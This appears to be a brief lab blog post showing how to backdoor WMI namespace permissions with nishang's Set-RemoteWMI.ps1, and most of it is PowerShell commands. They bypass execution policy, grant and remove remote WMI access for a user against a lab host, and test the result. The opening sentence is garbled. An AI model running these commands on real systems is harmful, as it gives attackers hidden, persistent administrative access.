Security Descriptor

This Allow a particular useror group o WMI namesscth sae privilegessa of administrator:

PS C:\Users\victim6\Downloads> cd .\new\new\tool\tool\nishang-master\nishang-master\Backdoors\

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> . .\Set-RemoteWMI.ps1 PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName victim6 –verbose

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName administrator -ComputerName 192.168.222.144 -Credential SECURITY\administrator –verbose

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> powershell -ep bypass

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> . .\Set-RemoteWMI.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> help set-remotewmi –Examples

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName administrator -ComputerName 192.168.222.144 -Credential SECURITY\administrator –verbose

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName administrator -ComputerName 192.168.222.144 -Credential SECURITY\administrator -verbose -remove

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Get-WmiObject -class win32_computersystem -ComputerName 192.168.222.144

Set-RemoteWMI.ps1 from nishang:

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName administrator -namespace ‘root\cimv2’ -verbose –notallnamespaces

To Remove the entries of the user:

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName  administrator -verbose –remove

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -username administrator -ComputerName 192.168.222.144 -Credential SECURITY\administrator -verbose -namespace root\cimv2 –notallnamespaces

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -username administrator -ComputerName 192.168.222.144 -Credential SECURITY\administrator -verbose -namespace root\cimv2 -notallnamespaces –remove

@Saksham Dixit

Related Posts

COMMENTS

Leave a Reply

Your email address will not be published. Required fields are marked *